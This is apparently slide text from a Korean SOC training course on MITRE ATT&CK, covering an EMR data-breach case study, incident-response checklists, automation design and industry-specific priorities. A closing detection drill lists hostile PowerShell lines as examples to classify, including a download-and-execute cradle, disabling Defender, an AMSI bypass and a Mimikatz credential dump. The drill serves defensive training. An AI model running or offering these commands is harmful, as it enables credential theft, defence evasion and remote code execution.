외부 노출 EMR 로그인 페이지에 SQLi 공격 → 관리자 계정 비밀번호 해시 추출

T1078 — 탈취 관리자 계정으로 EMR 접근

크랙된 해시로 EMR 관리자 패널 접근. 환자 데이터베이스 전체 접근 권한 확보

T1005 — 로컬 데이터 수집

환자 기록 100만 건 CSV 내보내기. 진단 정보·개인정보·보험 정보 포함

T1567.002 — 클라우드 스토리지 유출

2.8GB CSV 파일 Mega.nz 업로드. 다크웹 포럼에 판매 게시

헬스케어 특수 대응 요건

72시간 신고: 개인정보보호위원회 72시간 내 신고 의무
환자 통지: 유출된 환자 개별 통보 의무 (개인정보보호법)
의료법 위반: 환자 비밀 유출 형사 처벌 가능
EMR 공급사 협력: 취약점 수정 패치 긴급 요청

🚨 탐지 공백 원인:
① WAF 없이 EMR 포탈 직접 인터넷 노출
② 관리자 MFA 미설정
③ DB 접근 로그 미수집 (대량 내보내기 탐지 불가)
④ Proxy에 대용량 업로드 경보 없음

보강 설명의료 정보 유출 사고를 ATT&CK으로 분석합니다. HIPAA·개인의료정보 관련 규제 요건과 ATT&CK Coverage의 연계를 다룹니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬 선명해집니다.

T1190T1078헬스케어 보안

시나리오 확장

T1190가 앞뒤 단계와 어떻게 이어지는지 정리
T1078를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

취약점 공개 후 72시간 SOC 대응 플레이북

CVE 발표 → 패치 → 탐지 → 소급 분석 — 72시간 안에 완료해야 할 것들

취약점 긴급 대응

0~4h

즉각 자산 파악

영향받는 소프트웨어 버전 식별. 인터넷 노출 자산 우선. CMDB 또는 Shodan으로 노출 현황 파악

4~12h

긴급 탐지 룰 배포

CVE PoC 분석 → 익스플로잇 패턴 추출 → SIEM 룰 긴급 배포. SigmaHQ에서 커뮤니티 룰 확인

12~48h

패치 적용 + 소급 분석

우선순위 대로 패치 적용. 동시에 최근 30일 로그 소급 분석 → 이미 공격받았는지 확인

48~72h

완료 확인 + Coverage 업데이트

모든 자산 패치 완료 확인. 탐지 룰 Coverage 점수 업데이트. 소급 분석 결과 보고

72시간 체크리스트

☐ 영향 자산 목록 작성 완료
☐ 임시 완화 조치 적용 (WAF 룰, 접근 제한)
☐ 탐지 룰 SIEM 배포 완료
☐ 소급 30일 분석 결과 확인
☐ 패치 적용률 추적 (목표: 100%)
☐ 경영진 진행 상황 보고
☐ ATT&CK Coverage 업데이트

💡 소급 분석 우선순위:
CISA KEV 취약점 → 인터넷 노출 서비스 → 권한 있는 시스템 순서로 소급 분석

보강 설명주요 취약점이 공개된 직후 72시간 동안 SOC가 해야 할 일을 ATT&CK 관점에서 정리합니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아집니다.

취약점 공개 대응72시간 대응긴급 패치

설계 포인트

취약점 공개 대응에 필요한 Data Source를 먼저 정리하기
72시간 대응를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

치트시트 10: 인시던트 대응 빠른 참조 카드 (최종)

사고 현장에서 즉각 참조 — 단계별 핵심 액션과 에스컬레이션 기준

치트시트 10 (최종)

 즉각 대응 (0~30분)
☐ 경보 확인·분류 (5W1H)
☐ ATT&CK 초기 매핑
☐ 티켓 개설 + 기록 시작
☐ 에스컬레이션 필요 여부
☐ 증거 보존 시작
☐ 격리 여부 결정


 조사 단계 (30분~4시간)
☐ 로그 소급 수집 (±30분)
☐ 체인 재구성 완성
☐ 피해 범위 파악
☐ 피벗 분석 실행
☐ IOC 추출·공유
☐ 30초 보고 작성


 봉쇄·복구 (4시간~)
☐ Persistence 전수 제거
☐ C2 차단·계정 비활성화
☐ 감염 경로 패치
☐ 단계적 복구
☐ 재감염 모니터링 72h
☐ PIR 작성

🚨 즉각 P0 에스컬레이션 기준:
랜섬웨어 암호화 진행 중 / EDR 에이전트 강제 중지 / DC 비정상 접근 / 대량 데이터 유출 진행 중

✅ 대응 완료 기준:
Persistence 완전 제거 확인 / 초기 침투 벡터 차단 / Coverage 업데이트 / PIR 완성 / 사후 모니터링 72시간 이상

보강 설명인시던트 대응 시 즉각 참조할 수 있는 최종 치트시트입니다. 사고 단계별 핵심 액션, 에스컬레이션 기준, 주요 연락처 형식을 담았습니다. 정의·대표 Technique·추가 질문을 함께 정리해 두면 복습 효율이 올라갑니다.

IR 빠른 참조에스컬레이션 기준단계별 액션

복습 포인트

IR 빠른 참조 핵심 정의를 한 문장으로 다시 말하기
에스컬레이션 기준와 연결되는 대표 로그 또는 사례 1개 떠올리기
다음 슬라이드로 이어지는 질문을 스스로 만들기

암기보다 이해

왜 필요한지와 무엇을 판단하는지 구분하기
용어-목적-근거를 세 칸 표처럼 정리하기
팀원에게 설명해 보며 빈 구간을 찾기

학습 요소

단계별 액션 관련 ATT&CK ID·로그·조치를 묶어 기억하기
오탐 가능성과 탐지 공백도 함께 적어 두기
실제 현업 사례 1개와 연결해 기억 강화

Module 5 수료 선언 — 여러분은 해냈습니다

300장의 슬라이드를 함께 완주한 여러분에게 — 진심으로 수고하셨습니다

수료 선언

이번 모듈에서 우리가 함께 한 것

✅ ATT&CK 14개 Tactic 완전 이해
✅ 수십 개 Technique 심층 분석
✅ 실전 로그 분석과 공격 체인 재구성
✅ 탐지 룰 설계와 Coverage 분석
✅ 헌팅 방법론과 플레이북 작성
✅ 캡스톤 + 팀 과제 + 최종 평가
✅ 경영진 보고와 커뮤니케이션 훈련
✅ 실무 적용 계획 수립

앞으로의 여정

이번 주 월요일: 실무 첫 번째 행동 실천
매주: 탐지 룰 1개 개선 + 헌팅 가설 1개
매월: Coverage 분석 업데이트
분기: Purple Team + ATT&CK 업데이트 반영
1년: 52개 Technique 심층 학습 완료 목표

🎓 다음 모듈 안내:
Module 6: AI 기반 보안 운영 자동화
Module 7: 클라우드 보안 운영 실무
Module 8: 위협 인텔리전스 고급 과정

보강 설명Module 5의 모든 내용을 완료했습니다. 수강생들의 노고에 감사하고, 함께 더 안전한 디지털 세상을 만들어 가자는 메시지로 마무리합니다. 정의·대표 Technique·추가 질문을 함께 정리해 두면 복습 효율이 올라갑니다.

수료축하함께하는 보안

복습 포인트

수료 핵심 정의를 한 문장으로 다시 말하기
축하와 연결되는 대표 로그 또는 사례 1개 떠올리기
다음 슬라이드로 이어지는 질문을 스스로 만들기

암기보다 이해

왜 필요한지와 무엇을 판단하는지 구분하기
용어-목적-근거를 세 칸 표처럼 정리하기
팀원에게 설명해 보며 빈 구간을 찾기

학습 요소

함께하는 보안 관련 ATT&CK ID·로그·조치를 묶어 기억하기
오탐 가능성과 탐지 공백도 함께 적어 두기
실제 현업 사례 1개와 연결해 기억 강화

보안 자동화 파이프라인 완전 설계

탐지부터 봉쇄까지 — 자동화할 것과 인간이 결정할 것의 경계를 명확히 그린다

자동화 심화

자동

IOC 수신 → 즉각 차단

TI 피드에서 신규 C2 IP 수신 → FW·DNS 차단 목록 자동 추가 → SIEM 경보 규칙 자동 생성. 인간 개입 없음 (신뢰 소스 한정)

자동

경보 발화 → 컨텍스트 수집

경보 발화 시 관련 로그 자동 수집, VT 조회, 자산 정보 첨부, 티켓 자동 생성. 분석가가 티켓 열면 이미 정보 완비

반자동

Low Confidence 경보 → 자동 종결 제안

알려진 오탐 패턴 + 화이트리스트 → 자동 종결 제안. 분석가가 5초 내 승인 안 하면 수동 검토 대기

반자동

High Confidence → 격리 권고

lsass.exe 접근 + 보안 에이전트 중지 → 격리 버튼 자동 팝업. 분석가가 승인하면 즉각 실행

수동

비즈니스 영향 결정

핵심 서버 격리, 서비스 중단, 고객 통보. 반드시 인간 승인 필요. 자동화 금지 영역

자동화 성숙도 단계

Level 1: 알림·티켓 자동 생성
Level 2: 컨텍스트 자동 수집·첨부
Level 3: 저위험 경보 자동 종결
Level 4: 격리·차단 자동 실행 (승인 후)
Level 5: 완전 자율 대응 (고위험 제외)

⚠️ 자동화의 역설: 자동화가 많아질수록 분석가의 판단력이 약해질 위험. 주기적으로 수동 분석 훈련을 유지해야 긴급 상황에서 자동화 실패 시 대처 가능

보강 설명 탐지부터 대응까지 자동화하는 완전한 파이프라인 설계를 다룹니다. 어디까지 자동화하고 어디서 인간이 개입해야 하는지의 경계를 설계합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

보안 자동화자동화 파이프라인인간-기계 협업

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
보안 자동화·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

모바일 기기 ATT&CK: iOS·Android 공격 패턴

BYOD 환경의 새로운 위협 — Mobile ATT&CK 매트릭스와 MDM 기반 탐지

모바일 보안

모바일 ATT&CK 주요 Technique

T1476 Deliver Malicious App: 공식 앱스토어 외 악성 앱 설치 (사이드로딩)
T1521 Encrypted Channel: 암호화 통신으로 탐지 우회
T1418 App Info Discovery: 설치된 앱 목록 수집 (스파이웨어)
T1429 Capture Audio: 마이크 무단 녹음
T1430 Location Tracking: GPS 위치 추적
T1516 Input Injection: 접근성 기능 악용한 입력 조작

기업 MDM 기반 탐지

Jailbreak/Root 탐지: MDM에서 비정상 디바이스 상태 감지
비승인 앱 설치: 앱 목록 검사, 비승인 앱 설치 경보
비정상 네트워크: 모바일 기기의 알 수 없는 외부 통신
자격증명 피싱: 모바일 피싱 페이지 URL 탐지
데이터 유출: 기업 앱에서 개인 클라우드로의 복사

📍 참고: attack.mitre.org/matrices/mobile/ — Mobile ATT&CK 별도 매트릭스. iOS와 Android 환경의 공격 기법 체계적으로 정리

보강 설명iOS와 Android 기기를 대상으로 한 공격 패턴을 ATT&CK으로 분석합니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

T1476T1521모바일 ATT&CK

설명 확장

T1476를 목적-기술-근거 관점으로 다시 정리하기
T1521와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

모바일 ATT&CK 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

사이버 위협 예측 분석: 다음 단계를 미리 막는다

현재 탐지된 Technique에서 다음 ATT&CK 단계를 예측 — 선제 방어로 피해를 줄인다

예측 분석

탐지 Technique → 다음 예측

현재 탐지	다음 예상 단계	선제 대응
T1566 피싱 클릭	T1059 Execution → T1071 C2	PS Script Block 로깅 확인, 아웃바운드 모니터링 강화
T1003 자격증명 탈취	T1021 Lateral Move → T1078 다른 계정	AD 이상 로그인 감시, DC 접근 임계값 낮춤
T1021 RDP 내부이동	T1005/T1039 수집 → T1567 유출	파일 서버 DLP 강화, 대용량 복사 경보 즉각
T1562 EDR 비활성화	T1003 덤프 → T1486 랜섬웨어	즉각 격리 (P0). 더 기다리면 암호화 시작
T1490 VSS 삭제	T1486 파일 암호화 (수분 내)	즉시 격리 + 백업 무결성 확인 + BCP 발동

예측 기반 방어 원칙

체인 사고: 단일 이벤트가 아닌 공격 체인으로 상황을 읽어라
타임라인 압박 이해: C2 수립 후 수집까지 수 시간, 랜섬웨어 전 VSS 삭제는 수 분
선제적 감시 강화: 탐지된 Technique의 다음 단계 Data Source 모니터링 즉각 강화
격리 타이밍: 너무 이르면 증거 손실, 너무 늦으면 피해 확산 — 균형점 판단

"공격자의 다음 행동을 알면 우리는 항상 한 발 앞서 있다."

보강 설명 CTI와 ATT&CK을 결합해 다음 공격 단계를 예측하는 방법입니다. 현재 탐지된 Technique에서 다음에 올 Technique를 예측하고 선제 방어를 준비합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

사이버 위협 예측다음 단계 예측공격 시퀀스

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
사이버 위협 예측·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

ATT&CK 기반 보안 감사: 탐지 실효성 평가

Coverage 점수가 감사 증빙이 된다 — 외부 감사자에게 탐지 체계를 어떻게 설명하는가

보안 감사

ATT&CK 기반 감사 프레임워크

Coverage 현황 문서: Technique별 0~3 점수 + 탐지 방법 설명
탐지 룰 목록: ATT&CK 태그 부착된 전체 룰 목록 + 최근 발화 이력
검증 증빙: Purple Team 또는 Atomic Red Team 실행 결과 보고서
개선 이력: 이전 감사 지적 사항 → 개선 완료 증빙
헌팅 기록: 월간 헌팅 캠페인 실행 결과 문서

감사자 주요 확인 질문과 답변 준비

Q: 랜섬웨어 공격 탐지 가능한가?
A: T1486 Coverage 3(검증 완료) — Atomic Red Team 검증 결과 [날짜] 첨부
Q: 탐지 룰이 실제로 동작하는가 확인했는가?
A: 분기별 Purple Team 실시, Coverage DB 버전 이력 제출
Q: 탐지되지 않는 영역이 있는가?
A: Coverage 0 Technique [목록], 개선 로드맵 Q1 완료 계획 제출

보강 설명ATT&CK Coverage를 기반으로 보안 감사를 수행하는 방법입니다. 외부 감사자나 내부 감사팀이 탐지 체계의 실효성을 평가하는 프레임워크를 다룹니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워…

T1486보안 감사ATT&CK 기반 감사

설명 확장

T1486 기준으로 첫 단서를 먼저 분류하기
보안 감사를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

업계별 ATT&CK 적용 특수 고려사항

같은 ATT&CK, 다른 우선순위 — 업종별 위협 행위자·규제·환경에 맞게 Coverage를 조정한다

업계별 적용

업종	주요 위협	특수 ATT&CK 우선순위	규제 연계
금융	Lazarus, APT38, BEC	T1657(금전 탈취), T1078, T1566	전자금융감독규정, ISMS-P
의료	랜섬웨어 그룹, 데이터 브로커	T1486(랜섬웨어), T1530(스토리지), T1190(EMR)	개인정보보호법, 의료법
제조/OT	국가지원 APT, 산업 스파이	T0882(데이터 탈취), T0831(제어 조작), T1190	산업보안법, ICS-CERT
공공기관	북한 APT(Kimsuky, Lazarus)	T1566(피싱), T1195(공급망), T1078	국가정보원 지침, ISMS
IT/테크	공급망 공격, 랜섬웨어	T1195.002(소프트웨어 공급망), T1648(서버리스)	ISMS-P, 클라우드 보안인증
에너지/유틸리티	국가지원 APT, OT 공격	T0800(펌웨어 공격), T1190, T1562(방어 우회)	산업제어시스템 보안지침

💡 업계별 우선순위 결정 방법:
① KISA/CISA에서 해당 업종 위협 보고서 확인
② 같은 업종 최근 침해 사례 ATT&CK TTP 분석
③ 가장 많이 사용된 Technique + 현재 Coverage 교차
④ 규제 요건과 Coverage 매핑해 준수 항목 확인

✅ 핵심: 글로벌 ATT&CK을 그대로 적용하지 말고, 내 업종의 실제 위협 행위자 TTP를 기반으로 Coverage 우선순위를 업종 맞춤형으로 조정해야 한다

보강 설명 금융, 의료, 제조, 공공기관 등 업계별로 ATT&CK 적용 시 특수하게 고려해야 할 사항을 정리합니다. 각 업종의 규제 환경과 주요 위협 행위자를 연결합니다. 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

업계별 ATT&CK금융 보안의료 보안

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
업계별 ATT&CK·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

멀티 스레드 공격 탐지: 동시 다중 경로 분석

공격자는 동시에 여러 경로를 시도한다 — 분산된 이벤트를 하나의 공격자로 연결하는 방법

고급 상관 분석

멀티 스레드 공격 패턴

동시 브루트포스: 여러 계정에 동시 Spraying — 각각 임계값 미달이지만 합산하면 이상
병렬 Lateral Move: 한 호스트에서 동시에 여러 내부 시스템으로 RDP 시도
분산 C2: 여러 호스트에서 각각 다른 C2로 통신하지만 동일 공격자 인프라
다중 Initial Access: VPN + 웹 포탈 + 피싱 동시 시도

연결 방법

공격 소스 IP 클러스터링: 같은 /24 서브넷 공격 = 동일 인프라 가능성
타이밍 상관: 여러 호스트에서 30분 내 동일 패턴 발생
IOC 공유: 여러 경보가 동일 C2 도메인·IP 공유
공격 도구 지문: User-Agent·JA3·도구 특성이 같으면 동일 공격자
계정 연쇄: 탈취 계정들이 같은 소스에서 사용됨

💡 핵심 원칙: 각 경보를 독립으로 보지 말고, 같은 시간대·공유 IOC·유사 패턴의 경보를 그룹핑해 하나의 공격 캠페인으로 연결하면 전체 그림이 보인다

보강 설명공격자가 동시에 여러 경로로 침투를 시도하는 멀티 스레드 공격을 탐지하는 방법입니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

멀티 스레드 공격동시 다중 경로고급 상관 분석

설명 확장

멀티 스레드 공격를 목적-기술-근거 관점으로 다시 정리하기
동시 다중 경로와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

고급 상관 분석 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

국제 사이버 보안 협력과 ATT&CK 정보 공유

혼자 싸우지 않아도 된다 — 국내외 정보 공유 체계로 집단 방어를 강화한다

국제 협력

주요 국제 협력 채널

FIRST (Forum of IR and ST): 전 세계 CSIRT 네트워크. 사고 정보 공유, 공동 대응 협력
CISA JCDC: 미국 CISA 합동 사이버 방어 협력. 주요 인프라 위협 사전 공유
KISA C-TAS: 국내 사이버 위협 정보 공유 시스템. ATT&CK TTP 포함 공유
업종별 ISAC: 금융, 의료, 에너지 등 동종 업계 위협 공유
STIX/TAXII 국제 표준: 자동화 정보 공유 프로토콜로 실시간 TI 배포

정보 공유 시 고려사항

TLP 준수: 공유 범위(RED/AMBER/GREEN/CLEAR) 반드시 표기
민감 정보 제거: 자사 IP, 직원 정보, 고객 데이터 제거 후 공유
법무 검토: 특정 국가 기관과 공유 시 법적 검토 필요
ATT&CK 태그 포함: 공유 IOC에 관련 Technique ID 포함 → 수신측 즉각 탐지 적용

✅ 공유의 힘: 내가 분석한 IOC를 ISAC에 공유하면 다른 조직이 같은 공격을 사전에 막을 수 있고, 반대로 다른 조직의 IOC로 내가 보호받는다 — 집단 방어의 핵심

보강 설명사이버 위협 정보를 국제적으로 공유하는 체계와 ATT&CK의 역할을 다룹니다. FIRST, CISA, KISA 등의 국제 협력 채널을 활용하는 방법을 설명합니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커…

국제 정보 공유FIRSTISAC

설명 확장

국제 정보 공유를 목적-기술-근거 관점으로 다시 정리하기
FIRST와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

ISAC 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

랜섬웨어 사후 처리: 협상·수사·보험·복구의 ATT&CK 연계

암호화 이후 — 협상 여부 결정부터 수사 협조까지 ATT&CK 분석이 모든 단계의 근거가 된다

랜섬웨어 사후 처리

협상 여부 결정 프레임워크

백업 복구 가능 여부: 오프라인 백업이 있다면 협상 불필요
데이터 유출 확인: Exfiltration 증거가 있으면 이중 협박 → 지불해도 유출 데이터 악용 가능
공격 그룹 식별: 알려진 협상 불이행 그룹 → 지불해도 복호화 키 미제공 가능
법적 규제: OFAC 제재 대상 그룹에 지불 시 법적 위험
비즈니스 연속성: 복구 불가 vs 비즈니스 중단 비용 비교

ATT&CK 분석의 사후 역할

수사 협조: 공격 체인 재구성 → 경찰청 사이버범죄수사대 제출 자료
사이버 보험 청구: 침해 경위 ATT&CK 문서 → 보험사 제출 증빙
제조사/공급망 통보: 취약점 정보 책임 있는 공개
재발 방지 계획: Coverage 공백 → 개선 로드맵 → 경영진 승인

🚨 절대 원칙: 협상·지불 여부는 반드시 법무팀·보안 전문가·경영진 공동 결정. 개인 판단으로 결정하면 법적·재정적 책임 문제 발생 가능

보강 설명랜섬웨어 공격 후 협상 여부 결정과 사후 처리 과정을 다룹니다. ATT&CK 분석 결과가 협상 결정과 수사 협조에 어떻게 활용되는지 설명합니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬 선명해집니다.

랜섬웨어 협상몸값 지불 결정수사 협조

시나리오 확장

랜섬웨어 협상가 앞뒤 단계와 어떻게 이어지는지 정리
몸값 지불 결정를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

ATT&CK 기반 팀 내 보안 교육 프로그램 설계

Tier 1부터 탐지 엔지니어까지 — 역할별 다른 ATT&CK 교육 커리큘럼을 설계한다

교육 프로그램 설계

역할별 교육 커리큘럼

역할	핵심 교육 내용	실습
Tier 1	14개 Tactic, 기본 매핑, 플레이북 따라하기	기본 로그 매핑 실습
Tier 2	체인 재구성, 헌팅 기초, Coverage 분석	시나리오 분석 실습
탐지 엔지니어	Sigma, 상관 규칙, Purple Team, 자동화	탐지 룰 설계 실습
Threat Hunter	가설 수립, 통계 분석, CTI 연동	헌팅 캠페인 실전
관리자/CISO	Coverage KPI, 경영진 보고, 예산 계획	TTX 참여

지속 교육 프로그램 구조

주간: 팀 내 경보 사례 공유 + 매핑 토론 (15분)
월간: 신규 Technique 학습 + DetectionLab 실습 (1시간)
분기: ATT&CK 업데이트 리뷰 + Purple Team (반나절)
연간: 외부 교육(이 과정 수준) + 자격증 취득

✅ 가장 효과적인 교육: 실제 경보를 함께 분석하는 것. 수업 말고 일상 업무 속에서 ATT&CK을 적용하는 습관이 진짜 역량을 만든다

보강 설명ATT&CK을 활용한 팀 내 보안 교육 프로그램을 설계하는 방법입니다. 역할별 다른 교육 커리큘럼과 지속적인 역량 개발 프로그램을 만드는 방법을 다룹니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커…

보안 교육 설계역할별 커리큘럼ATT&CK 교육 프로그램

설명 확장

보안 교육 설계를 목적-기술-근거 관점으로 다시 정리하기
역할별 커리큘럼와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

ATT&CK 교육 프로그램 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

수료 이후 첫 30일 ATT&CK 실무 적용 액션 플랜

교육 효과는 수료 후 30일이 결정한다 — 구체적 주차별 목표로 습관을 만들어라

수료 후 액션 플랜

주차별 목표

주차	목표	성공 기준
1주	ATT&CK 언어 사용 시작	경보 3건에 Technique 태그 직접 부착
2주	Coverage 현황 파악	TOP 10 Technique 현재 Coverage 점수 작성
3주	첫 탐지 룰 개선	오탐 많은 룰 1개 튜닝 완료
4주	첫 헌팅 가설 실행	가설 1개 작성·실행·결과 문서화 완료

일일 5분 ATT&CK 습관

오늘 처리한 경보 1건: ATT&CK 태그 부착 (1분)
이번 주 새로 본 TTP: 메모에 기록 (2분)
오늘 개선할 수 있는 것: 1가지 적기 (2분)

파트너 확인 약속

오늘 짝을 정한 파트너와 다음 약속을 합니다:

2주 후: 서로의 1주 성과 확인 메시지
4주 후: 30일 액션 플랜 완료 여부 확인 통화
3개월 후: 서로의 Coverage 분석 결과 공유

보강 설명수료 후 첫 30일 동안 실무에 ATT&CK을 적용하는 구체적인 액션 플랜을 작성합니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

수료 후 30일액션 플랜주차별 목표

설명 확장

수료 후 30일를 목적-기술-근거 관점으로 다시 정리하기
액션 플랜와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

주차별 목표 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

🏆 Module 5 — 완성

ATT&CK은
지식이 아니라
습관이다

300장의 슬라이드를 함께 완주했습니다.
하지만 진짜 학습은 이제부터 시작됩니다.

매일 아침 경보 한 건에 ATT&CK 태그를 다는 것,
매주 오탐 룰 하나를 개선하는 것,
매달 헌팅 가설 하나를 실행하는 것.

이 작은 반복이 쌓여 전문가가 됩니다.

총 슬라이드

300장

다룬 Technique

100+개

실습·시나리오

40+개

치트시트

10개

(주)아울네스트 · 한국인터넷진흥원 발주 · 26년 AI 보안운영 및 위협탐지 실무인력 양성 · 2026

T1059.001 PowerShell — 정탐/오탐 실전 판단 훈련 20선

같은 powershell.exe라도 CommandLine에 따라 완전히 다른 위험도 — 아래 20개를 5초씩 판단하라

실전 판단 훈련

#	CommandLine 발췌	판단	근거
1	`-File C:\Scripts\backup.ps1`	정상	서명된 스크립트, 알려진 경로
2	`-w hidden -enc SQBFAFgA...`	악성	숨김+인코딩 조합
3	`-NonI -NoP Get-Process`	조사	비대화형+정책무시, 행위 확인 필요
4	`IEX (New-Object Net.WebClient).DownloadString('http://...')`	악성	원격 코드 직접 실행(Fileless)
5	`-ExecutionPolicy Bypass -File deploy.ps1`	조사	정책 우회, 스크립트 내용 확인
6	`Get-ADUser -Filter * -Properties *`	조사	AD 전체 조회, 시간·계정 맥락
7	`-w hidden -c "Start-Process calc.exe"`	악성	숨김+비정상 프로세스 실행
8	`Invoke-WebRequest -Uri https://known-cdn.com/update.zip`	조사	알려진 CDN 여부, 다운로드 이후 행위
9	`Set-MpPreference -DisableRealtimeMonitoring $true`	악성	AV 실시간 보호 비활성화(T1562.001)
10	`-File "C:\Program Files\vendor\maint.ps1"`	정상	벤더 설치 경로, 서명 확인

#	CommandLine 발췌	판단	근거
11	`[Convert]::FromBase64String('aGVsbG8...')`	조사	디코딩 자체는 정상일 수 있음, 결과 확인
12	`-c "whoami /all; ipconfig /all; net user"`	악성	정찰 명령 연속 실행(T1082+T1087)
13	`Compress-Archive -Path C:\Users -DestPath C:\Temp\all.zip`	악성	전체 사용자 폴더 압축(T1560)
14	`-NonInteractive -Command "Update-Module"`	정상	자동 업데이트, 비대화형 정상 케이스
15	`amsiInitFailed` (스크립트 내)	악성	AMSI Bypass 시도(T1562.001)
16	`-w 1 -NoProfile Import-Module PSWindowsUpdate`	정상	최소화+모듈, 자동 업데이트 패턴
17	`Invoke-Mimikatz -DumpCreds`	악성	Mimikatz 직접 호출(T1003.001)
18	`-c "ping -n 1 10.0.0.{1..254}"`	악성	내부 IP 스캔(T1046 Network Scan)
19	`-File \\DC01\NETLOGON\logon.ps1`	정상	도메인 로그온 스크립트 표준 경로
20	`-EncodedCommand JABj... (Parent: WINWORD.EXE)`	악성	Office→PS 인코딩 = T1566.001 체인

